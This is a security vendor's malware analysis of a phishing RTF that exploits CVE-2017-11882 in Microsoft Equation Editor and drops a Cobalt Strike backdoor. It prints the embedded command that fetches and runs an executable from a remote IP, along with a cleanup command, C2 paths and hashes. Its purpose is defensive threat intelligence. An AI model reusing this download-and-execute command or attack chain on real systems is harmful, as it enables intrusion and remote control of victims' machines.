Cb Connect 2018 | Power of You | Register Now


Threat Analysis: Equation Equals Backdoor

November 22, 2017 / Eric Merritt , Jared Myers

On November 20, 2017 the exploit for CVE-2017-11882 was publicly released, which allowed for code execution in vulnerable versions of Microsoft’s Equation editor.  

CVE-2017-11882 affects the following versions of Microsoft Office:

  • Microsoft Office 2007 Service Pack 3
  • Microsoft Office 2010 Service Pack 2
  • Microsoft Office 2013 Service Pack 1
  • Microsoft Office 2016

Microsoft Equation Editor, which is a Microsoft Office component, contains a stack buffer overflow that allows remote code execution on a vulnerable system. Microsoft Equation Editor is an out-of-process COM server that is hosted by eqnedt32.exe.

DEP and ASLR should protect against such attacks, however, because of the manner in which eqnedt32.exe was linked, it will not utilize these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to eqnedt32.exe, unless applied system-wide.  This provides the attacker with a avenue to lure targets into clicking on a specially crafted documents, resulting in the ability to execute an embedded attacker command.

In the sample analyzed, ultimately a Cobalt Strike payload was dropped on the compromised system, however as the exploitation of this CVE continues to gain traction practitioners can expect other families to be used.  It should be noted that Cobalt Strike is a commercial tool, that was designed to be used by pen testers and red teamers to simulate adversarial attacks. The Carbon Black TAU expects this vulnerability to get actively exploited in both spam and spear phishing campaigns, over the next quarter.  The graphic below highlights the overall process, which is detailed in the technical analysis section.

Figure 1: Process Overview

Technical analysis of a sample utilizing CVE-2017-11882 is detailed in the below.  The Carbon Black TAU created a separate document for customers, which details how they can utilize Carbon Black products to protect themselves against this type of attack.

Technical Analysis

Malicious Document – Stage One

File Name       : Изменения правил осуществления переводов.rtf
File Name 1     : account details.rtf
File Name 2     : news.swift.rtf
File Size       : 31,811
CRC32           : c326285e
MD5             : f360d41a0b42b129f7f0c29f98381416
SHA1            : 245b867e578e9df12877df07017338863a5fdc59
SHA256          : 17f9db18327a29777b01d741f7631d9eb9c7e4cb33aa0905670154a5c191195c

Table 1: Sample metadata

The initial document contains a malicious equation that exploits the CVE-2017-11882 vulnerability.  The exploit allows a crafted document to execute a command (with a maximum length of 44 bytes) via a call to the WinExec API.  This exploit was released and documented in this post.  The command will call cmd.exe to download and execute a payload from a remote system, which is displayed in the table below.

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000940            0A 0A 01 08 5A  5A 63 6D 64 20 2F 63 20          ZZcmd /c
00000950   73 74 61 72 74 20 5C 5C  31 33 38 2E 36 38 2E 32   start \\138.68.2
00000960   33 34 2E 31 32 38 5C 77  5C 77 2E 65 78 65 20 26   34.128\w\w.exe &
00000970   41 41 41 41 41 12 0C 43                            AAAAA  C

Table 2: Embedded Command

It should be noted that the payload in this document matches (with the only differences being the command itself) the object_data template and object_trailer from a Proof of Concept for CVE-2017-11882.

Dropper – Stage Two

Stage two of the attack chain contains a dropper with the final payload as a resource.  The dropper is wrapped in a custom packer and then wrapped again in UPX.  Once through the packers, the dropper prepares the third stage of the chain by finding it in the binary resource section as C132

Figure 2: Load Resource

Next, the dropper searches for wmplayer.exe in the expected 32 and 64-bit locations.

Figure 3: wmplayer.exe search

Wmplayer.exe is created as a suspended process and the stage three DLL is injected into it and instructed to run.  Finally, the dropper executes a command to delete the stage two dropper and exits.

cmd.exe /C Del <path_to_original_dropper>

Table 3: Clean up command

Backdoor – Stage Three

The final stage is a Cobalt Backdoor that connects back to the C&C server at:

    • /j.ad
    • /submit.php
  • User-Agent
    • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)

This final payload allows the attacker full control over the system.  The backdoor is capable of executing arbitrary command from the C2 server as well as injecting additional payloads into memory using the ReflectiveLoader export of the DLL.


Spam campaigns do their best to take advantage of the latest and most modular types of attacks, using the most recent vulnerabilities in order to maximize their effectiveness against the largest amount of targets. The Carbon Black TAU is constantly monitoring the threat landscape in order to provide the community and our customers with the latest trends and IOCs to increase security across the board.

In order to decrease the likelihood of infection, everyone should ensure that the latest security updates are installed and users should not open suspicious documents that they are not expecting.  






Payload Delivery Server


Command and Control Server



Payload (w.exe)



Payload (w.exe)



Cobalt Strike (final) Backdoor



Cobalt Strike (final) Backdoor


TAGS: Backdoor Cobalt Strike / CVE-2017-11882 / Equation Editor / exploit / Exploitation / Malware Analysis / Payload